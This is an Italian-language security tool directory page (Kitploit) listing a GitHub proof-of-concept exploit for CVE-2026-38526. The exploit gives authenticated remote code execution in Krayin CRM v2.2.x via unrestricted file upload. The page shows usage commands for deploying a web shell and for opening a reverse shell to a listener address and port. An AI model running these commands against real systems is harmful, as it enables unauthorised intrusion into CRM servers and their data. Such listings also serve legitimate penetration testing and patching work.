Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-38526 — Proof-of-concept exploit per esecuzione remota di codice autenticata in Krayin CRM v2.2.x tramite upload di file senza restrizioni, con supporto per payload web shell e reverse shell. | Kitploit
Strumenti/GitHubGitHub/qurclinc/cve-2026-38526
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubqurclinc/cve-2026-38526

CVE-2026-38526

Proof-of-concept exploit per esecuzione remota di codice autenticata in Krayin CRM v2.2.x tramite upload di file senza restrizioni, con supporto per payload web shell e reverse shell.

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-38526 - Krayin CRM RCE

Descrizione

Script PoC per la vulnerabilità critica in Krayin CRM v2.2.x che consente RCE autenticato tramite upload di file senza restrizioni.

Utilizzo

root@kitploit:~
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123

# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444

Requisiti

  • Python 3.8+
  • requests, bs4

Dichiarazione di non responsabilità

Solo a scopo educativo.

Riferimento

  • https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md
Scarica lo strumento